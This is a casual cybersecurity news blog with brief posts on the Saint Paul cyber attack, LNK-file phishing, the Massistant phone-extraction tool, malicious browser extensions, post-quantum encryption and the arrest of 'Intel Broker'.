CybrR3sBlog

The National Guard was called in last Friday July 25th in Saint Paul Minnesota due to a large scale cyber attack which knocked out online payments to the city as well as some library services. Supposedly the Nation Guard was called in to provide extra cyber resources as well as the Minnesota Information Technology Services and an unnamed third party. From the reporting around this incident and the seemingly wide spread of the effect we can assume it was rather serious. There has been limited reporting since the attack which leads me to believe they have yet to find how who/how this attack was carried out. There has been little public discussion much less uproar about the hack so maybe we will never know. Could probably ask the cyber department at metro but idk I'm a little lazy. https://cyberr3sblog.blogspot.com/2025/08/week-11-saint-paul-cyber-attack.html

  Phishing has taken on a new dimension in the last few years: using LNK files (Microsoft specific files that can provide a shortcut from one file to another). The purpose of these files is specifically to open PowerShell and run a command to download more malware from an online server. The group Patchwork has been associated with the recent LNK spear phishing attacks against defense contractors in Turkey specifically. Since 2009 the malware group has been suspected of associating with the State of India making them a formattable threat. References: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/

 This is a slightly concerning tool that has been made pubic by Lookout and reported on by the Hacker News. The tool Massistant, developed by Chinese company Meiya Pico allows for law enforcement (or anyone who gets their hands on it) to extract photos, sms messages, and GPS data from mobile devices. The assumption is that the tool will be primarily used at border crossings, allowing LE to compromised the device and extract data with out the knowledge of the mobile owner. Maybe most suprising is that Meiya Pico claims Massistant has the ability to collect data from E2E (end to end) encryption apps like Telegram and Signal. References: https://thehackernews.com/2025/07/chinas-massistant-tool-secretly.html

Eighteen browser extensions for Google's Chrome and Microsoft's Edge have been identified as malicious trojan horse  type viruses harming an estimated 2.3 million users. For reference, a trojan virus takes its name from the Greek myth involving the trojan war in which a large wooden horse was presented as a gift to the city of Troy. When the Trojans accepted the gift past their large walls, enemy soldiers jumped out. In our case today a trojan virus is a piece of software which presents as something beneficial to the user but later reviles itself to be malicious. Specifically the extension Colour Picker Tool--Geco was verified by Google and had over 800 rating in the store with an average rating of 4.2 (an impressive piece of malware). Researcher of the malware stated, "[t]his is a carefully crafted Trojan horse that delivers exactly what is promises...while simultaneously hijacking your browser , tracking every website you visit, and maintaining a persistent command and c...

 The Hacker News reported, in February, that Google's cloud service Key Management Systems  would begin using quantum encryption for its digital signature. This is the future of a technological process we have been studying this week, digital encryption. A long standing problem in not just cyber work but communication in general. It is often pointed to Roman times that encryption first came about. A code called the "Caesar Cypher" was nothing more than a means of shifting the alphabet--the exact shift would be called the key . Today we use modern standard of encryption for most of our digital communication such as AES-256 and RSA. These methods utilize large prime number multiplication and remainder math to create a key which is virtually impossible to crack with a classic computer. However, the advancement of mathematical equations (specifically Shor's algorithm) and quantum computing have lead to the research of "post quantum encryption" PQE. This is what ...

Yesterday, June 25th, a 25 year old British man named Kai West was arrested in a years long investigation that cumulated in a sting operation to discover the identity of the infamous "Intel Broker". He  had for years posted and sold compromised data on the website Breached Forums . The investigation came to its conclusion when an undercover agent posed as a buyer for stolen data. The payment was sent to Intel Broker's BTC (bitcoin address) which was allegedly tied to his Coinbase account.  This strikes me as pretty odd and even a little funny. I am sure we will learn more as the story develops but as one of the most wanted hackers in Europe your opsec was bad enough to use Coinbase when selling top secret data. Something about the store seems a little weird. Most Black Hat hackers use money laundering schemes like Monero at the very minimum to "clean" their money. I don't know anything though so if someone wants to explain it to me please do.  Resources:  ht...